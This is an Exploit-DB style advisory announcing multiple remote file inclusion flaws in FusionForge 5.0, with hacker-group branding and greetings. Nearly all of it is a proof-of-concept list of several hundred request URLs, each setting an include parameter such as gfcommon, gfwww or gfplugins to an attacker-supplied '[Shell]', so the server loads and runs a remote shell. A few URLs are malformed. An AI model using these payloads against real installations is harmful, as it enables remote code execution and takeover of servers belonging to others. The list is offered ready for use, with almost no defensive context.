FusionForge 5.0 - Multiple Remote File Inclusions

EDB-ID:

12179

CVE:

N/A


Author:

cr4wl3r

Type:

webapps


Platform:

PHP

Date:

2010-04-12


[+] FusionForge 5.0 Multiple Remote File Include Vulnerability

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : Inj3ct0r.com                                  0
1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1
0                                                                      0
1                    ######################################            1
0                    I'm cr4wl3r  member from Inj3ct0r Team            1
1                    ######################################            0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

[+] Discovered By: cr4wl3r
[+] Download: https://fusionforge.org/frs/download.php/24/fusionforge-5.0-allinone.tar.bz2
[+] Greetz: All member inj3ct0r.com, manadocoding.net, sekuritionline.net, gcc team

[+] Thanks to: str0ke, opt!x hacker, xoron, cyberlog, irvian, antihack, angky.tatoki, 
               EA ngel, zvtral, s4va, bL4Ck_3n91n3, untouch, team_elite, zreg, mywisdom, 
               SENOT, kec0a, d3viln3t, p4p4y, cybertomat, etaxCrew, emen, and all my friend

[+] PoC:

http://shell4u.tk/[path]/common/docman/Document.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/docman/DocumentFactory.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/docman/DocumentGroup.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/forum/Forum.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/forum/ForumsForUser.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/forum/ForumFactory.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/forum/ForumMessage.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/forum/ForumMessageFactory.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/frs/FRSFile.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/frs/FRSPackage.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/frs/FRSRelease.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/include/MailParser.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/include/SCMPlugin.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/include/FusionForge.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/include/GroupJoinRequest.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/include/Permission.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/include/Role.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/include/session.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/include/RoleObserver.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/include/Group.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/include/System.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/include/User.class.php?gfwww=[Shell]
http://shell4u.tk/[path]/common/include/system/LDAP.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/include/system/NSSPGSQL.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/include/system/pgsql.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/include/system/UNIX.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/mail/MailingList.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/mail/MailingListFactory.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/pm/import_utils.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/pm/ProjectTask.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/pm/ProjectCategory.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/pm/ProjectTaskFactory.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/pm/ProjectGroup.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/pm/ProjectTasksForUser.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/pm/ProjectGroupFactory.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/reporting/ReportGroupCum.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/reporting/ReportSiteAct.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/reporting/ReportUserAdded.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/reporting/ReportProjectAct.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/reporting/ReportSiteTime.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/reporting/ReportUserCum.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/reporting/ReportDownloads.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/reporting/ReportProjectTime.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/reporting/ReportTrackerAct.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/reporting/ReportUserTime.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/reporting/ReportGroupAdded.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/reporting/ReportSetup.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/reporting/ReportUserAct.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/reporting/TimeEntry.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/scm/SCMFactory.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/search/ArtifactSearchQuery.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/search/ForumsSearchQuery.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/search/ProjectSearchQuery.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/search/TrackersSearchQuery.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/search/DocsSearchQuery.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/search/FrsSearchQuery.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/search/ExportProjectSearchQuery.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/search/NewsSearchQuery.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/search/SkillSearchQuery.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/search/ForumSearchQuery.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/search/PeopleSearchQuery.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/search/TasksSearchQuery.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/survey/SurveyResponse.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/survey/SurveyFactory.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/survey/SurveyResponseFactory.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/survey/SurveyQuestion.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/survey/SurveyQuestionFactory.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/tracker/Artifact.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/tracker/ArtifactExtraField.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/tracker/ArtifactFromID.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/tracker/ArtifactQueryFactory.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/tracker/ArtifactTypeFactory.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/tracker/ArtifactExtraFieldElement.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/tracker/ArtifactHistory.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/tracker/Artifacts.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/tracker/ArtifactTypes.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/tracker/ArtifactBoxOptions.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/tracker/ArtifactFactory.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/tracker/ArtifactMessage.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/tracker/ArtifactsForUser.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/tracker/ArtifactCanned.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/tracker/ArtifactFile.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/tracker/ArtifactQuery.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/tracker/ArtifactType.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/cronjobs/forum_gateway.php?gfwww=[Shell]
http://shell4u.tk/[path]/cronjobs/ftp_create_group_access.php?gfwww=[Shell]
http://shell4u.tk/[path]/cronjobs/send_pending_items_mail.php?gfwww=[Shell]
http://shell4u.tk/[path]/cronjobs/stats_projects-backfill.php?gfwww=[Shell]
http://shell4u.tk/[path]/cronjobs/tracker_gateway.php?gfwww=[Shell]
http://shell4u.tk/[path]/cronjobs/update_filesize.php?gfwww=[Shell]
http://shell4u.tk/[path]/plugins/aselectextauth/include/ASelectAuthPlugin.class.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/aselectextauth/include/aselectextauth-init.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/contribtracker/common/contribtracker-init.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/contribtracker/common/cvssyncmail-init.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/contribtracker/include/cvssyncmail-init.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/cvstracker/common/cvstracker-init.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/eirc/include/eirc-init.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/eirc/www/eirc.php?gfwww=[Shell]
http://shell4u.tk/[path]/plugins/externalsearch/include/ExternalHtmlSearchRenderer.class.php?gfwww=[Shell]
http://shell4u.tk/[path]/plugins/externalsearch/include/ExternalSearchEngine.class.php?gfwww=[Shell]
http://shell4u.tk/[path]/plugins/externalsearch/include/externalsearch-init.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/externalsearch/include/ExternalSearchPlugin.class.php?gfwww=[Shell]
http://shell4u.tk/[path]/plugins/extratabs/extratabs-init.php?GLOBALS[sys_plugins_path]=[Shell]
http://shell4u.tk/[path]/plugins/fckeditor/common/fckeditor-init.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/globalsearch/common/globalsearch-init.php?GLOBALS[sys_plugins_path]=[Shell]
http://shell4u.tk/[path]/plugins/helloworld/common/helloworld-init.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/ldapextauth/include/ldapextauth-init.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/ldapextauth/include/LdapExtAuthPlugin.class.php?GLOBALS[gfcommon]=[Shell]
http://shell4u.tk/[path]/plugins/mantis/include/mantis-init.php?gfplugins?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/mediawiki/common/mediawiki-init.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/online_help/common/online_help-init.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/projectlabels/common/projectlabels-init.phpGLOBALS[sys_plugins_path]=[Shell]
http://shell4u.tk/[path]/plugins/projects_hierarchy/common/projects_hierarchy-init.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/projects_hierarchy/www/wait_son.php?gfwww=[Shell]
http://shell4u.tk/[path]/plugins/quota_management/common/quota_management-init.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/quota_management/www/index.php?gfwww=[Shell]
http://shell4u.tk/[path]/plugins/quota_management/www/quota.php?gfwww=[Shell]
http://shell4u.tk/[path]/plugins/quota_management/www/quota_admin.php?gfwww=[Shell]
http://shell4u.tk/[path]/plugins/quota_management/www/quota_project.php?gfwww=[Shell]
http://shell4u.tk/[path]/plugins/scmarch/common/scmarch-init.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/scmbzr/common/scmbzr-init.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/scmccase/common/scmccase-init.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/scmcpold/common/scmcpold-init.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/scmcvs/common/scmcvs-init.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/scmcvs/ftp_create.php?gfwww=[Shell]
http://shell4u.tk/[path]/plugins/scmdarcs/common/scmdarcs-init.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/scmgit/common/scmgit-init.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/scmhg/common/scmhg-init.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/scmsvn/common/scmsvn-init.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/svncommitemail/common/svncommitemail-init.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/svntracker/bin/post.php?gfconfig=[Shell]
http://shell4u.tk/[path]/plugins/svntracker/common/svntracker-init.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/common/webcalendar-init.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/activity_log.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/add_entry.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/admin.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/admin_handler.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/adminhome.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/approve_entry.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/assistant_edit.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/assistant_edit_handler.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/availability.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/category.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/category_handler.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/colors.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/datesel.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/day.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/del_entry.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/del_layer.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/edit_entry.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/edit_entry_handler.php?gfwww=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/edit_layer.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/edit_layer_handler.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/edit_nonusers.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/edit_nonusers_handler.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/edit_report.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/edit_report_handler.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/edit_template.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/edit_user.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/edit_user_handler.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/export.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/export_handler.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/group_edit.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/group_edit_handler.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/help_admin.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/help_bug.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/help_edit_entry.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/help_import.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/help_index.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/help_layers.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/help_pref.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/import.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/import_handler.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/layers.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/layers_toggle.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/list_unapproved.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/month.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/nonusers_handler.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/pref.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/purge.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/reject_entry.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/report.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/search.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/search_handler.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/select_user.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/set_entry_cat.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/users.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/usersel.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/view_d.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/view_entry.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/view_l.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/view_m.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/view_t.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/view_v.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/view_w.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/views.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/views_edit.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/views_edit_handler.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/week.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/week_details.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/year.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/wiki/common/WikiGroupSearchEngine.class.php?GLOBALS[gfwww]=[Shell]
http://shell4u.tk/[path]/plugins/wiki/common/WikiSearchEngine.class.php?GLOBALS[gfwww]=[Shell]
http://shell4u.tk/[path]/plugins/wiki/common/WikiHtmlSearchRenderer.class.php?GLOBALS[gfwww]=[Shell]
http://shell4u.tk/[path]/plugins/wiki/common/WikiSearchQuery.class.php?GLOBALS[gfcommon]=[Shell]
http://shell4u.tk/[path]/plugins/wiki/include/WikiGroupSearchEngine.class.php?gfwww=[Shell]
http://shell4u.tk/[path]/plugins/wiki/include/WikiSearchEngine.class.php?GLOBALS[gfwww]=[Shell]
http://shell4u.tk/[path]/plugins/wiki/include/WikiHtmlSearchRenderer.class.php?gfwww=[Shell]
http://shell4u.tk/[path]/plugins/wiki/include/WikiSearchQuery.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/utils/fixscripts/tools_data_cleanup.php?gfwww=[Shell]
http://shell4u.tk/[path]/www/index_std.php?gfcommon=[Shell]
http://shell4u.tk/[path]/www/docman/include/DocumentGroupHTML.class.php?gfwww=[Shell]
http://shell4u.tk/[path]/www/forum/admin/ForumAdmin.class.php?gfwww=[Shell]
http://shell4u.tk/[path]/www/forum/include/AttachManager.class.php?gfwww=[Shell]
http://shell4u.tk/[path]/www/forum/include/ForumHTML.class.php?gfwww=[Shell]
http://shell4u.tk/[path]/www/include/stats_function.php?gfwww=[Shell]
http://shell4u.tk/[path]/www/include/user_home.php?gfwww=[Shell]
http://shell4u.tk/[path]/www/include/features_boxes.php?gfcommon=[Shell]
http://shell4u.tk/[path]/www/include/note.php?gfwww=[Shell]
http://shell4u.tk/[path]/www/include/pre.php?gfcommon=[Shell]
http://shell4u.tk/[path]/www/include/Layout.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/www/include/project_home.php?gfwww=[Shell]
http://shell4u.tk/[path]/www/plugins/webcalendar/admin_ha.php?gfplugins=[Shell]
http://shell4u.tk/[path]/www/plugins/webcalendar/activity.php?gfplugins=[Shell]
http://shell4u.tk/[path]/www/plugins/webcalendar/adminhom.php?gfplugins=[Shell]
http://shell4u.tk/[path]/www/plugins/webcalendar/add_entr.php?gfplugins=[Shell]
http://shell4u.tk/[path]/www/plugins/webcalendar/approve_.php?gfplugins=[Shell]
http://shell4u.tk/[path]/www/plugins/webcalendar/admin.php?gfplugins=[Shell]
http://shell4u.tk/[path]/www/plugins/webcalendar/assistan.php?gfplugins=[Shell]
http://shell4u.tk/[path]/www/pm/add_task.php?gfwww=[Shell]
http://shell4u.tk/[path]/www/pm/mod_task.php?gfwww=[Shell]
http://shell4u.tk/[path]/www/pm/browse_task.php?gfcommon=[Shell]
http://shell4u.tk/[path]/www/pm/postuploadcsv.php?gfcommon=[Shell]
http://shell4u.tk/[path]/www/pm/downloadcsv.php?gfcommon=[Shell]
http://shell4u.tk/[path]/www/pm/include/ProjectGroupHTML.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/www/pm/include/ProjectTaskHTML.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/www/pm/msproject/msp.php?gfwww=[Shell]
http://shell4u.tk/[path]/www/pm/msproject/xmlparser.php?gfwww=[Shell]
http://shell4u.tk/[path]/www/reporting/timeentry.php?gfcommon=[Shell]
http://shell4u.tk/[path]/www/search/include/SearchManager.class.php?gfwww=[Shell]
http://shell4u.tk/[path]/www/search/include/engines/ArtifactSearchEngine.class.php?gfwww=[Shell]
http://shell4u.tk/[path]/www/search/include/engines/FrsGroupSearchEngine.class.php?gfwww=[Shell]
http://shell4u.tk/[path]/www/search/include/engines/TasksGroupSearchEngine.class.php?gfwww=[Shell]
http://shell4u.tk/[path]/www/search/include/engines/DocsGroupSearchEngine.class.php?gfwww=[Shell]
http://shell4u.tk/[path]/www/search/include/engines/GroupSearchEngine.class.php?gfwww=[Shell]
http://shell4u.tk/[path]/www/search/include/engines/TrackersGroupSearchEngine.class.php?gfwww=[Shell]
http://shell4u.tk/[path]/www/search/include/engines/ForumSearchEngine.class.php?gfwww=[Shell]
http://shell4u.tk/[path]/www/search/include/engines/NewsGroupSearchEngine.class.php?gfwww=[Shell]
http://shell4u.tk/[path]/www/search/include/engines/ForumsGroupSearchEngine.class.php?gfwww=[Shell]
http://shell4u.tk/[path]/www/search/include/renderers/AdvancedSearchHtmlSearchRenderer.class.php?gfwww=[Shell]
http://shell4u.tk/[path]/www/search/include/renderers/ForumsHtmlSearchRenderer.class.php?gfwww=[Shell]
http://shell4u.tk/[path]/www/search/include/renderers/HtmlSearchRenderer.class.php?gfwww=[Shell]
http://shell4u.tk/[path]/www/search/include/renderers/ProjectRssSearchRenderer.class.php?gfwww=[Shell]
http://shell4u.tk/[path]/www/search/include/renderers/TasksHtmlSearchRenderer.class.php?gfwww=[Shell]
http://shell4u.tk/[path]/www/search/include/renderers/ArtifactHtmlSearchRenderer.class.php?gfwww=[Shell]
http://shell4u.tk/[path]/www/search/include/renderers/FrsHtmlSearchRenderer.class.php?gfwww=[Shell]
http://shell4u.tk/[path]/www/search/include/renderers/NewsHtmlSearchRenderer.class.php?gfwww=[Shell]
http://shell4u.tk/[path]/www/search/include/renderers/RssSearchRenderer.class.php?gfwww=[Shell]
http://shell4u.tk/[path]/www/search/include/renderers/TrackersHtmlSearchRenderer.class.php?gfwww=[Shell]
http://shell4u.tk/[path]/www/search/include/renderers/DocsHtmlSearchRenderer.class.php?gfwww=[Shell]
http://shell4u.tk/[path]/www/search/include/renderers/FullProjectHtmlSearchRenderer.class.php?gfwww=[Shell]
http://shell4u.tk/[path]/www/search/include/renderers/PeopleHtmlSearchRenderer.class.php?gfwww=[Shell]
http://shell4u.tk/[path]/www/search/include/renderers/ForumHtmlSearchRenderer.class.php?gfwww=[Shell]
http://shell4u.tk/[path]/www/search/include/renderers/HtmlGroupSearchRenderer.class.php?gfwww=[Shell]
http://shell4u.tk/[path]/www/search/include/renderers/ProjectHtmlSearchRenderer.class.php?gfwww=[Shell]
http://shell4u.tk/[path]/www/search/include/renderers/SkillHtmlSearchRenderer.class.php?gfwww=[Shell]
http://shell4u.tk/[path]/www/soap/common/group.php?gfcommon=[Shell]
http://shell4u.tk/[path]/www/soap/common/user.php?gfcommon=[Shell]
http://shell4u.tk/[path]/www/soap/docman/docman.php?gfcommon=[Shell]
http://shell4u.tk/[path]/www/soap/frs/frs.php?gfcommon=[Shell]
http://shell4u.tk/[path]/www/soap/pm/pm.php?gfcommon=[Shell]
http://shell4u.tk/[path]/www/soap/reporting/timeentry.php?gfcommon=[Shell]
http://shell4u.tk/[path]/www/soap/tracker/query.php?gfcommon=[Shell]
http://shell4u.tk/[path]/www/soap/tracker/tracker.php?gfcommon=[Shell]
http://shell4u.tk/[path]/www/squal/get_session_hash.php?gfwww=[Shell]
http://shell4u.tk/[path]/www/survey/include/SurveyHTML.class.php?gfwww=[Shell]
http://shell4u.tk/[path]/www/themes/gforge/Theme.class.php?gfwww=[Shell]
http://shell4u.tk/[path]/www/themes/gforge-classic/Theme.class.php?gfwww=[Shell]
http://shell4u.tk/[path]/www/themes/gforge-simple-theme/Theme.class.php?gfwww=[Shell]
http://shell4u.tk/[path]/www/tracker/browse.php?gfcommon=[Shell]
http://shell4u.tk/[path]/www/tracker/downloadcsv.php?gfcommon=[Shell]
http://shell4u.tk/[path]/www/tracker/query.php?gfcommon=[Shell]
http://shell4u.tk/[path]/www/tracker/include/ArtifactFileHtml.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/www/tracker/include/ArtifactHtml.class.php?gfcommon=[Shell]

that's it :)